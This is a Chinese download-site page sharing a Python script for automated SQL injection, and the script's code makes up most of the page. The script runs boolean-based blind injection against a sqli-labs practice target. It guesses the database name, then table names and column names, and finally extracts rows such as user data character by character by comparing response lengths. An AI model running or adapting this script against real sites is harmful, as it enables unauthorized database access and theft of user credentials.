【免费】Python实现自动sql注入

共1个文件

py：1个

python

sql

需积分: 0 43 浏览量 2023-07-26 22:52:01 上传评论 1 收藏 1KB RAR 举报

资源推荐

资源详情

资源评论

收起资源包目录

Python实现自动sql注入.rar （1个子文件）

Python实现自动sql注入

Python实现自动sql注入.py 5KB

import requests import string url = "http://192.168.2.134:83/Less-8/" normalHtmlLen = len(requests.get(url=url + "?id=1").text) print("The len of HTML:" + str(normalHtmlLen)) dbNameLen = 0 # 判断数据库长度 while True: dbNameLen_url = url + "?id=1'+and+length(database())=" + str(dbNameLen) + "--+" print(dbNameLen_url) if len(requests.get(dbNameLen_url).text) == normalHtmlLen: print("The len of dbName:" + str(dbNameLen)) break # 超出长度抛出错误 if dbNameLen == 30: print("Error!") break dbNameLen += 1 dbName = "" # 爆破数据库名 for i in range(1, dbNameLen + 1): for a in string.ascii_lowercase: dbName_url = url + "?id=1'+and+substr(database()," + str(i) + ",1)='" + a + "'--+" print(dbName_url) if len(requests.get(dbName_url).text) == normalHtmlLen: dbName += a print(dbName) break # 判断表长度 def biaoc(zhang): biao = 0 while True: dbNameLen_url = url + "?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit %s,1))=" % zhang + str( biao) + "--+" if len(requests.get(dbNameLen_url).text) == normalHtmlLen: print("The len of dbName:" + str(biao)) break # 超出长度抛出错误 if biao == 30: print("Error!") break biao += 1 return biao def biaom(biaoc, shu, shujuku): # 爆破表名 biaom = '' for i in range(1, biaoc + 1): for a in string.ascii_lowercase: dbName_url = url + "?id=1'+and+substr((select table_name from information_schema.tables where table_schema='%s' limit %s,1)," % ( shujuku, shu) + str(i) + ",1)='" + a + "'--+" print(dbName_url) if len(requests.get(dbName_url).text) == normalHtmlLen: biaom += a print(biaom) break return biaom # 获取列长 def lie(zhang): biao = 0 while True: dbNameLen_url = url + "?id=1' and length((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit %s,1))=" % zhang + str( biao) + "--+" if len(requests.get(dbNameLen_url).text) == normalHtmlLen: # print("The len of dbName:"+str(biao)) break # 超出长度抛出错误 if biao == 30: print("Error!") break biao += 1 return biao def liem(biaoc, shujuku, biao, zhang): # 爆破列名 biaom = '' for i in range(1, biaoc + 1): for a in string.ascii_lowercase: dbName_url = url + "?id=1'+and+substr((select column_name from information_schema.columns where table_schema='%s' and table_name='%s' limit %s,1)," % ( shujuku, biao, zhang) + str(i) + ",1)='" + a + "'--+" print(dbName_url) if len(requests.get(dbName_url).text) == normalHtmlLen: biaom += a print(biaom) break return biaom def user(biao, diji): # 爆破列名 biaom = '' for i in range(1, 10): for a in range(48, 122): dbName_url = url + "?id=1' and (select ascii(substr((select %s from users limit %s,1)," % ( biao, diji) + str(i) + ",1)))='" + str(a) + "'--+ " print(dbName_url) if len(requests.get(dbName_url).text) == normalHtmlLen: a = chr(a) biaom += a print(biaom) break return biaom biaoc1 = biaoc(0) biaoc2 = biaoc(1) biaoc3 = biaoc(2) biaoc4 = biaoc(3) biaom1 = biaom(biaoc1, 0, dbName) biaom2 = biaom(biaoc2, 1, dbName) biaom3 = biaom(biaoc3, 2, dbName) biaom4 = biaom(biaoc4, 3, dbName) def xianshi(): print('数据库长度为:' + str(dbNameLen), ' 数据库名为:' + str(dbName)) print('表1长度为:' + str(biaoc1), ' 表1名为:' + str(biaom1)) print('表2长度为:' + str(biaoc2), ' 表2名为:' + str(biaom2)) print('表3长度为:' + str(biaoc3), ' 表3名为:' + str(biaom3)) print('表4长度为:' + str(biaoc4), ' 表4名为:' + str(biaom4)) while True: xianshi() print('需要查询数据库的哪一个表的列名') aq = input() print('需要查询数据库的哪一个表第几列的列名') aw = input() jieguo=liem(lie(aw), dbName, aq, aw) xianshi() print('你查询的列名为:', str(jieguo)) print('需要查询%s表%s列的第几个数据'%(aq,jieguo)) ae=input() jieguo2=user(jieguo, ae) xianshi() print('你查询的列名为:', str(jieguo)) print('你查询的数据为:', str(jieguo2)) input("回车继续查询")

评论收藏

内容反馈